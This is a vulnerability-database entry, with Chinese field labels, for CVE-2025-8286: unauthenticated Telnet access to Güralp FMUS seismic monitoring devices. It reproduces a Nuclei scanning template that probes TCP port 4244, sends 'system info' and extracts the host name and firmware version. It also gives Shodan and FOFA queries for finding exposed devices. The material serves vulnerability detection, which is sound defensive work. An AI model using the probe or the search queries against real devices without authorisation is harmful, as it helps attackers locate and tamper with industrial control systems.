CVE-2025-8286: Güralp Systems FMUS Series - Unauthenticated Access

日期: 2025-08-01 | 影响软件: Güralp Systems FMUS Series | POC: 已公开

漏洞描述

Güralp Systems FMUS Series Seismic Monitoring Devices expose an unauthenticated Telnet-based command line interface that allows attackers to modify hardware configurations, manipulate data, or factory reset the device.

PoC代码[已公开]

id: CVE-2025-8286

info:
  name: Güralp Systems FMUS Series - Unauthenticated Access
  severity: critical
  author: darses
  description: |
    Güralp Systems FMUS Series Seismic Monitoring Devices expose an unauthenticated Telnet-based command line interface that allows attackers to modify hardware configurations, manipulate data, or factory reset the device.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to modify hardware configurations, manipulate data, or factory reset the device.
  reference:
    - https://www.cisa.gov/news-events/ics-advisories/icsa-25-212-01
    - https://www.cve.org/CVERecord?id=CVE-2025-8286
  remediation: |
    Update to the latest firmware version or apply vendor recommended patches to secure Telnet access.
  classification:
    cwe-id: CWE-306
    cve-id: CVE-2025-8286
    epss-score: 0.02215
    epss-percentile: 0.8389
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
  metadata:
    verified: true
    vendor: guralp_systems
    product: fmus_series_seismic_monitoring_devices
    shodan-query: '"Welcome to " "list of available commands" port:4244'
    fofa-query: '"Welcome to " && "list of available commands" && port="4244"'
  tags: cve,cve2025,tcp,network,telnet,guralp,ics

tcp:
  - host:
      - "{{Hostname}}"

    port: 4244

    inputs:
      - data: "\n"
        read: 256
        name: banner

      - data: "system info\n"
        read: 256
        name: system_info

    matchers-condition: and
    matchers:
      - type: word
        part: banner
        words:
          - "Welcome to "
          - 'type "help" for a list of available commands'
        condition: and

      - type: word
        part: system_info
        words:
          - "Host Name: "
          - "Firmware Version: "
        condition: and

    extractors:
      - type: regex
        part: system_info
        group: 1
        regex:
          - "Host\\s+Name:\\s+([\\w\\d\\.\\-]+)"

      - type: regex
        part: system_info
        group: 1
        regex:
          - "Firmware\\s+Version:\\s+([\\d\\.\\-]+)"
# digest: 4a0a00473045022011dc1ef952f9d02953f241ab7927bb96917000c4bb39fcae3675efd71efe7554022100a30dd91ae448daff65544c3cd3b681d01de353b59cb41669c35cf4306d697b7e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-8286.yaml